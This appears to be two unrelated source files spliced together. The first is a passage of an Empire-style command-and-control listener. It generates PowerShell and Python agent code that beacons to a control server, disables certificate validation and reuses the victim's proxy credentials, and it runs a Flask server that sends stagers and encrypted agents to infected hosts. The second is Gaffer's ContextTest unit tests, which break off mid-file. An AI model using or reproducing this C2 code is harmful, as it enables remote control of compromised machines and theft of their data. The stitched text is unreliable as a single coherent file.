code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print(helpers.color("[!] listeners/http_malleable generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
# extract the set options for this instantiated listener
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
# build profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
profile.get.client.host = host
profile.get.client.port = port
profile.post.client.host = host
profile.post.client.port = port
if language:
if language.lower() == 'powershell':
# PowerShell
vWc = helpers.generate_random_script_var_name("wc")
updateServers = "$Script:ControlServers = @(\"%s\");" % (host)
updateServers += "$Script:ServerIndex = 0;"
# ==== HANDLE SSL ====
if host.startswith('https'):
updateServers += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
# ==== DEFINE GET ====
getTask = "$script:GetTask = {"
getTask += "try {"
getTask += "if ($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {"
# ==== BUILD ROUTING PACKET ====
# meta 'TASKING_REQUEST' : 4
getTask += "$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4;"
getTask += "$RoutingPacket = [System.Text.Encoding]::Default.GetString($RoutingPacket);"
getTask += profile.get.client.metadata.generate_powershell("$RoutingPacket")
# ==== BUILD REQUEST ====
getTask += "$"+vWc+" = New-Object System.Net.WebClient;"
# ==== CONFIGURE PROXY ====
getTask += "$"+vWc+".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();"
getTask += "$"+vWc+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;"
getTask += "if ($Script:Proxy) {"
getTask += "$"+vWc+".Proxy = $Script:Proxy;"
getTask += "}"
# ==== CHOOSE URI ====
getTask += "$taskURI = " + ",".join(["'%s'" % u for u in (profile.get.client.uris if profile.get.client.uris else ["/"])]) + " | Get-Random;"
# ==== ADD PARAMETERS ====
first = True
for parameter, value in profile.get.client.parameters.items():
getTask += "$taskURI += '"+("?" if first else "&")+"';"
first = False
getTask += "$taskURI += '"+parameter+"="+value+"';"
if profile.get.client.metadata.terminator.type == malleable.Terminator.PARAMETER:
getTask += "$taskURI += '"+("?" if first else "&")+"';"
first = False
getTask += "$taskURI += '"+profile.get.client.metadata.terminator.arg+"=' + $RoutingPacket;"
if profile.get.client.metadata.terminator.type == malleable.Terminator.URIAPPEND:
getTask += "$taskURI += $RoutingPacket;"
# ==== ADD HEADERS ====
for header, value in profile.get.client.headers.items():
getTask += "$"+vWc+".Headers.Add('"+header+"', '"+value+"');"
if profile.get.client.metadata.terminator.type == malleable.Terminator.HEADER:
getTask += "$"+vWc+".Headers.Add('"+profile.get.client.metadata.terminator.arg+"', $RoutingPacket);"
# ==== ADD BODY ====
if profile.get.client.metadata.terminator.type == malleable.Terminator.PRINT:
getTask += "$body = $RoutingPacket;"
else:
getTask += "$body = '"+profile.get.client.body+"';"
# ==== SEND REQUEST ====
if profile.get.client.verb.lower() != "get" or profile.get.client.body or profile.get.client.metadata.terminator.type == malleable.Terminator.PRINT:
getTask += "$result = $"+vWc+".UploadData($Script:ControlServers[$Script:ServerIndex] + $taskURI, '"+ profile.get.client.verb +"', [System.Text.Encoding]::Default.GetBytes('"+ profile.get.client.body +"'));"
else:
getTask += "$result = $"+vWc+".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI);"
# ==== EXTRACT RESULTS ====
if profile.get.server.output.terminator.type == malleable.Terminator.HEADER:
getTask += "$data = $"+vWc+".responseHeaders.get('"+profile.get.server.output.terminator.arg+"');"
getTask += "Add-Type -AssemblyName System.Web; $data = [System.Web.HttpUtility]::UrlDecode($data);"
elif profile.get.server.output.terminator.type == malleable.Terminator.PRINT:
getTask += "$data = $result;"
getTask += "$data = [System.Text.Encoding]::Default.GetString($data);"
# ==== INTERPRET RESULTS ====
getTask += profile.get.server.output.generate_powershell_r("$data")
getTask += "$data = [System.Text.Encoding]::Default.GetBytes($data);"
# ==== RETURN RESULTS ====
getTask += "$data;"
getTask += "}"
# ==== HANDLE ERROR ====
getTask += "} catch [Net.WebException] {"
getTask += "$script:MissedCheckins += 1;"
getTask += "if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {"
getTask += "Start-Negotiate -S '$ser' -SK $SK -UA $ua;"
getTask += "}"
getTask += "}"
getTask += "};"
# ==== DEFINE POST ====
sendMessage = "$script:SendMessage = {"
sendMessage += "param($Packets);"
sendMessage += "if ($Packets) {"
# note: id container not used, only output
# ==== BUILD ROUTING PACKET ====
# meta 'RESULT_POST' : 5
sendMessage += "$EncBytes = Encrypt-Bytes $Packets;"
sendMessage += "$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5;"
sendMessage += "$RoutingPacket = [System.Text.Encoding]::Default.GetString($RoutingPacket);"
sendMessage += profile.post.client.output.generate_powershell("$RoutingPacket")
# ==== BUILD REQUEST ====
sendMessage += "if ($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {"
sendMessage += "$"+vWc+" = New-Object System.Net.WebClient;"
# ==== CONFIGURE PROXY ====
sendMessage += "$"+vWc+".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();"
sendMessage += "$"+vWc+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;"
sendMessage += "if ($Script:Proxy) {"
sendMessage += "$"+vWc+".Proxy = $Script:Proxy;"
sendMessage += "}"
# ==== CHOOSE URI ====
sendMessage += "$taskURI = " + ",".join(["'%s'" % u for u in (profile.post.client.uris if profile.post.client.uris else ["/"])]) + " | Get-Random;"
# ==== ADD PARAMETERS ====
first = True
for parameter, value in profile.post.client.parameters.items():
sendMessage += "$taskURI += '"+("?" if first else "&")+"';"
first = False
sendMessage += "$taskURI += '"+parameter+"="+value+"';"
if profile.post.client.output.terminator.type == malleable.Terminator.PARAMETER:
sendMessage += "$taskURI += '"+("?" if first else "&")+"';"
first = False
sendMessage += "$taskURI += '"+profile.post.client.output.terminator.arg+"=' + $RoutingPacket;"
if profile.post.client.output.terminator.type == malleable.Terminator.URIAPPEND:
sendMessage += "$taskURI += $RoutingPacket;"
# ==== ADD HEADERS ====
for header, value in profile.post.client.headers.items():
sendMessage += "$"+vWc+".Headers.Add('"+header+"', '"+value+"');"
if profile.post.client.output.terminator.type == malleable.Terminator.HEADER:
sendMessage += "$"+vWc+".Headers.Add('"+profile.post.client.output.terminator.arg+"', $RoutingPacket);"
# ==== ADD BODY ====
if profile.post.client.output.terminator.type == malleable.Terminator.PRINT:
sendMessage += "$body = $RoutingPacket;"
else:
sendMessage += "$body = '"+profile.post.client.body+"';"
# ==== SEND REQUEST ====
sendMessage += "try {"
if profile.post.client.verb.lower() != "get" or profile.post.client.body or profile.post.client.output.terminator.type == malleable.Terminator.PRINT:
sendMessage += "$result = $"+vWc+".UploadData($Script:ControlServers[$Script:ServerIndex] + $taskURI, '"+ profile.post.client.verb.upper() +"', [System.Text.Encoding]::Default.GetBytes($body));"
else:
sendMessage += "$result = $"+vWc+".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI);"
# ==== HANDLE ERROR ====
sendMessage += "} catch [System.Net.WebException] {"
sendMessage += "if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {"
sendMessage += "Start-Negotiate -S '$ser' -SK $SK -UA $ua;"
sendMessage += "}"
sendMessage += "}"
sendMessage += "}"
sendMessage += "}"
sendMessage += "};"
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
# Python
updateServers = "server = '%s'\n" % (host)
# ==== HANDLE SSL ====
if host.startswith("https"):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None\n"
sendMessage = "def send_message(packets=None):\n"
sendMessage += " global missedCheckins\n"
sendMessage += " global server\n"
sendMessage += " global headers\n"
sendMessage += " global taskURIs\n"
sendMessage += " vreq = type('vreq', (urllib.request.Request, object), {'get_method':lambda self:self.verb if (hasattr(self, 'verb') and self.verb) else urllib.request.Request.get_method(self)})\n"
# ==== BUILD POST ====
sendMessage += " if packets:\n"
# ==== BUILD ROUTING PACKET ====
sendMessage += " encData = aes_encrypt_then_hmac(key, packets)\n"
sendMessage += " routingPacket = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)\n"
sendMessage += "\n".join([" " + _ for _ in profile.post.client.output.generate_python("routingPacket").split("\n")]) + "\n"
# ==== CHOOSE URI ====
sendMessage += " taskUri = random.sample("+ str(profile.post.client.uris) +", 1)[0]\n"
sendMessage += " requestUri = server + taskUri\n"
# ==== ADD PARAMETERS ====
sendMessage += " parameters = {}\n"
for parameter, value in profile.post.client.parameters.items():
sendMessage += " parameters['"+parameter+"'] = '"+value+"'\n"
if profile.post.client.output.terminator.type == malleable.Terminator.PARAMETER:
sendMessage += " parameters['"+profile.post.client.output.terminator.arg+"'] = routingPacket\n"
sendMessage += " if parameters:\n"
sendMessage += " requestUri += '?' + urllib.parse.urlencode(parameters)\n"
if profile.post.client.output.terminator.type == malleable.Terminator.URIAPPEND:
sendMessage += " requestUri += routingPacket\n"
# ==== ADD BODY ====
if profile.post.client.output.terminator.type == malleable.Terminator.PRINT:
sendMessage += " body = routingPacket\n"
else:
sendMessage += " body = '"+profile.post.client.body+"'\n"
sendMessage += " try:\n body=body.encode()\n except AttributeError:\n pass\n"
# ==== BUILD REQUEST ====
sendMessage += " req = vreq(requestUri, body)\n"
sendMessage += " req.verb = '"+profile.post.client.verb+"'\n"
# ==== ADD HEADERS ====
for header, value in profile.post.client.headers.items():
sendMessage += " req.add_header('"+header+"', '"+value+"')\n"
if profile.post.client.output.terminator.type == malleable.Terminator.HEADER:
sendMessage += " req.add_header('"+profile.post.client.output.terminator.arg+"', routingPacket)\n"
# ==== BUILD GET ====
sendMessage += " else:\n"
# ==== BUILD ROUTING PACKET
sendMessage += " routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)\n"
sendMessage += "\n".join([" " + _ for _ in profile.get.client.metadata.generate_python("routingPacket").split("\n")]) + "\n"
# ==== CHOOSE URI ====
sendMessage += " taskUri = random.sample("+ str(profile.get.client.uris) +", 1)[0]\n"
sendMessage += " requestUri = server + taskUri\n"
# ==== ADD PARAMETERS ====
sendMessage += " parameters = {}\n"
for parameter, value in profile.get.client.parameters.items():
sendMessage += " parameters['"+parameter+"'] = '"+value+"'\n"
if profile.get.client.metadata.terminator.type == malleable.Terminator.PARAMETER:
sendMessage += " parameters['"+profile.get.client.metadata.terminator.arg+"'] = routingPacket\n"
sendMessage += " if parameters:\n"
sendMessage += " requestUri += '?' + urllib.parse.urlencode(parameters)\n"
if profile.get.client.metadata.terminator.type == malleable.Terminator.URIAPPEND:
sendMessage += " requestUri += routingPacket\n"
# ==== ADD BODY ====
if profile.get.client.metadata.terminator.type == malleable.Terminator.PRINT:
sendMessage += " body = routingPacket\n"
else:
sendMessage += " body = '"+profile.get.client.body+"'\n"
sendMessage += " try:\n body=body.encode()\n except AttributeError:\n pass\n"
# ==== BUILD REQUEST ====
sendMessage += " req = vreq(requestUri, body)\n"
sendMessage += " req.verb = '"+profile.get.client.verb+"'\n"
# ==== ADD HEADERS ====
for header, value in profile.get.client.headers.items():
sendMessage += " req.add_header('"+header+"', '"+value+"')\n"
if profile.get.client.metadata.terminator.type == malleable.Terminator.HEADER:
sendMessage += " req.add_header('"+profile.get.client.metadata.terminator.arg+"', routingPacket)\n"
# ==== SEND REQUEST ====
sendMessage += " try:\n"
sendMessage += " res = urllib.request.urlopen(req)\n"
# ==== EXTRACT RESPONSE ====
if profile.get.server.output.terminator.type == malleable.Terminator.HEADER:
header = profile.get.server.output.terminator.arg
sendMessage += " data = res.info().dict['"+header+"'] if '"+header+"' in res.info().dict else ''\n"
sendMessage += " data = urllib.parse.unquote(data)\n"
elif profile.get.server.output.terminator.type == malleable.Terminator.PRINT:
sendMessage += " data = res.read()\n"
# ==== DECODE RESPONSE ====
sendMessage += "\n".join([" " + _ for _ in profile.get.server.output.generate_python_r("data").split("\n")]) + "\n"
# before return we encode to bytes, since in some transformations "join" produces str
sendMessage += " if isinstance(data,str): data = data.encode('latin-1')\n"
sendMessage += " return ('200', data)\n"
# ==== HANDLE ERROR ====
sendMessage += " except urllib.request.HTTPError as HTTPError:\n"
sendMessage += " missedCheckins += 1\n"
sendMessage += " if HTTPError.code == 401:\n"
sendMessage += " sys.exit(0)\n"
sendMessage += " return (HTTPError.code, '')\n"
sendMessage += " except urllib.request.URLError as URLError:\n"
sendMessage += " missedCheckins += 1\n"
sendMessage += " return (URLError.reason, '')\n"
sendMessage += " return ('', '')\n"
return updateServers + sendMessage
else:
print(helpers.color("[!] listeners/template generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module."))
else:
print(helpers.color('[!] listeners/template generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# extract the set options for this instantiated listener
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
host = listenerOptions['Host']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
listenerName = listenerOptions['Name']['Value']
proxy = listenerOptions['Proxy']['Value']
proxyCreds = listenerOptions['ProxyCreds']['Value']
certPath = listenerOptions['CertPath']['Value']
# build and validate profile
profile = malleable.Profile._deserialize(listenerOptions["ProfileSerialized"]["Value"])
profile.validate()
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# initialize flask server
app = Flask(__name__)
self.app = app
@app.route('/', methods=["GET", "POST"])
@app.route('/<path:request_uri>', methods=["GET", "POST"])
def handle_request(request_uri="", tempListenerOptions=None):
"""
Handle an agent request.
"""
data = request.get_data()
clientIP = request.remote_addr
url = request.url
method = request.method
headers = request.headers
profile = malleable.Profile._deserialize(self.options["ProfileSerialized"]["Value"])
# log request
listenerName = self.options['Name']['Value']
message = "[*] {} request for {}/{} from {} ({} bytes)".format(request.method.upper(), request.host, request_uri, clientIP, len(request.data))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
try:
# build malleable request from flask request
malleableRequest = malleable.MalleableRequest()
malleableRequest.url = url
malleableRequest.verb = method
malleableRequest.headers = headers
malleableRequest.body = data
# fix non-ascii characters
if '%' in malleableRequest.path:
malleableRequest.path = urllib.parse.unquote(malleableRequest.path)
# identify the implementation by uri
implementation = None
for uri in sorted((profile.stager.client.uris if profile.stager.client.uris else ["/"]) + (profile.get.client.uris if profile.get.client.uris else ["/"]) + (profile.post.client.uris if profile.post.client.uris else ["/"]), key=len, reverse=True):
if request_uri.startswith(uri.lstrip("/")):
# match!
for imp in [profile.stager, profile.get, profile.post]:
if uri in (imp.client.uris if imp.client.uris else ["/"]):
implementation = imp
break
if implementation: break
# attempt to extract information from the request
if implementation:
agentInfo = None
if implementation is profile.stager and request.method == "POST":
# stage 1 negotiation comms are hard coded, so we can't use malleable
agentInfo = malleableRequest.body
elif implementation is profile.post:
# the post implementation has two spots for data, requires two-part extraction
agentInfo, output = implementation.extract_client(malleableRequest)
agentInfo = (agentInfo if agentInfo else b"") + (output if output else b"")
else:
agentInfo = implementation.extract_client(malleableRequest)
if agentInfo:
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, agentInfo, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode("latin-1")
if results == b'STAGE0':
# step 2 of negotiation -> server returns stager (stage 1)
# log event
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
# build stager (stage 1)
stager = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
# build malleable response with stager (stage 1)
malleableResponse = implementation.construct_server(stager)
return Response(malleableResponse.body, malleableResponse.code, malleableResponse.headers)
elif results.startswith(b'STAGE2'):
# step 6 of negotiation -> server sends patched agent (stage 2)
if ':' in clientIP:
clientIP = '[' + clientIP + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
# log event
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
# TODO: handle this with malleable??
tempListenerOptions = None
if "Hop-Name" in request.headers:
hopListenerName = request.headers.get('Hop-Name')
if hopListenerName:
try:
hopListener = data_util.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
session_info = Session().query(models.Agent).filter(
models.Agent.session_id == sessionID).first()
if session_info.language == 'ironpython':
version = 'ironpython'
else:
version = ''
# generate agent
agentCode = self.generate_agent(language=language,
listenerOptions=(tempListenerOptions if tempListenerOptions else listenerOptions),
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand,
version=version)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# build malleable response with agent
# note: stage1 comms are hard coded, can't use malleable here.
return Response(encryptedAgent, 200, implementation.server.headers)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
# agent returned an error
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
return Response(self.default_response(), 404)
elif results.startswith(b'ERROR:'):
# error parsing agent data
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response("", 401)
return Response(self.default_response(), 404)
elif results == b'VALID':
# agent posted results
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
malleableResponse = implementation.construct_server("")
return Response(malleableResponse.body, malleableResponse.code, malleableResponse.headers)
else:
if request.method == b"POST":
# step 4 of negotiation -> server returns RSA(nonce+AESsession))
# log event
message = "[*] Sending session key to {}".format(clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
# note: stage 1 negotiation comms are hard coded, so we can't use malleable
return Response(results, 200, implementation.server.headers)
else:
# agent requested taskings
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
# build malleable response with results
malleableResponse = implementation.construct_server(results)
if isinstance(malleableResponse.body, str):
malleableResponse.body = malleableResponse.body.encode('latin-1')
return Response(malleableResponse.body, malleableResponse.code, malleableResponse.headers)
else:
# no tasking for agent
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
# build malleable response with no results
malleableResponse = implementation.construct_server(results)
return Response(malleableResponse.body, malleableResponse.code, malleableResponse.headers)
else:
# log error parsing routing packet
message = "[!] Error parsing routing packet from {}: {}.".format(clientIP, str(agentInfo))
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
# log invalid request
message = "[!] /{} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
else:
# log invalid uri
message = "[!] unknown uri /{} requested by {}.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
except malleable.MalleableError as e:
# probably an issue with the malleable library, please report it :)
message = "[!] Malleable had trouble handling a request for /{} by {}: {}.".format(request_uri, clientIP, str(e))
signal = json.dumps({
'print': True,
'message': message
})
return Response(self.default_response(), 200)
try:
if host.startswith('https'):
if certPath.strip() == '' or not os.path.isdir(certPath):
print(helpers.color("[!] Unable to find certpath %s, using default." % certPath))
certPath = "setup"
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed - %s: %s" % (port, e.__class__.__name__, str(e))))
message = "[!] Listener startup on port {} failed - {}: {}".format(port, e.__class__.__name__, str(e))
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_malleable/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in
the self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6,16), charset=chars)
return cookie
|
ContextTest.py | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import imath
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.failUnless( context.isSame( c ) )
changes.append( ( name, context.get( name, None ) ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
self.assertEqual( changes, [ ( "a", 2 ) ] )
c["a"] = 3
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ) ] )
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# Removing variables should also trigger the changed signal.
del changes[:]
c.remove( "a" )
self.assertEqual( changes, [ ( "a", None ) ] )
del c["b"]
self.assertEqual( changes, [ ( "a", None ), ( "b", None ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.failUnless( isinstance( c["int"], int ) )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.failUnless( isinstance( c["float"], float ) )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.failUnless( isinstance( c["string"], basestring ) )
c["v2i"] = imath.V2i( 1, 2 )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.assertEqual( c.get( "v2i" ), imath.V2i( 1, 2 ) )
c.set( "v2i", imath.V2i( 1, 2 ) )
self.assertEqual( c["v2i"], imath.V2i( 1, 2 ) )
self.failUnless( isinstance( c["v2i"], imath.V2i ) )
c["v3i"] = imath.V3i( 1, 2, 3 )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.assertEqual( c.get( "v3i" ), imath.V3i( 1, 2, 3 ) )
c.set( "v3i", imath.V3i( 1, 2, 3 ) )
self.assertEqual( c["v3i"], imath.V3i( 1, 2, 3 ) )
self.failUnless( isinstance( c["v3i"], imath.V3i ) )
c["v2f"] = imath.V2f( 1, 2 )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.assertEqual( c.get( "v2f" ), imath.V2f( 1, 2 ) )
c.set( "v2f", imath.V2f( 1, 2 ) )
self.assertEqual( c["v2f"], imath.V2f( 1, 2 ) )
self.failUnless( isinstance( c["v2f"], imath.V2f ) )
c["v3f"] = imath.V3f( 1, 2, 3 )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.assertEqual( c.get( "v3f" ), imath.V3f( 1, 2, 3 ) )
c.set( "v3f", imath.V3f( 1, 2, 3 ) )
self.assertEqual( c["v3f"], imath.V3f( 1, 2, 3 ) )
self.failUnless( isinstance( c["v3f"], imath.V3f ) )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.failIf( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.failIf( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.failUnless( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.failUnless( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.failIf( c.isSame( Gaffer.Context.current() ) )
def f() :
self.failIf( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.failUnless( c.isSame( Gaffer.Context.current() ) )
self.failIf( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.failIf( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.failIf( c["v"].isSame( v ) )
def testGetWithDefault( self ) :
c = Gaffer.Context()
self.assertRaises( RuntimeError, c.get, "f" )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
